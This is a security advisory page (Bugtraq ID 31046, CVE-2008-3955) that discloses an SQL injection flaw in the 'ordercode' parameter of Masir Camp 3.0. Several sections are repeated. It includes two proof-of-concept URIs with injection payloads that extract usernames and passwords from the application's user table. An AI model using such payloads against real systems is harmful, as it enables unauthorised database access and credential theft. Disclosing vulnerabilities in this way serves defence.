Masir Camp 'ordercode' Parameter SQL Injection Vulnerability
BID:31046
Info
Masir Camp 'ordercode' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 31046 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3955 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 07 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | AmnPardaz Security Research Team |
| Vulnerable: |
MASIR.IT Masir Camp 3.0 |
| Not Vulnerable: | |
Discussion
Masir Camp 'ordercode' Parameter SQL Injection Vulnerability
Masir Camp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects Masir Camp 3.0 and prior versions.
Masir Camp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects Masir Camp 3.0 and prior versions.
Exploit / POC
Masir Camp 'ordercode' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)--
http://www.example.com/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)--
http://www.example.com/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)--
Solution / Fix
Masir Camp 'ordercode' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Masir Camp 'ordercode' Parameter SQL Injection Vulnerability
References:
References:
- Masir Camp Homepage (MASIR.IT)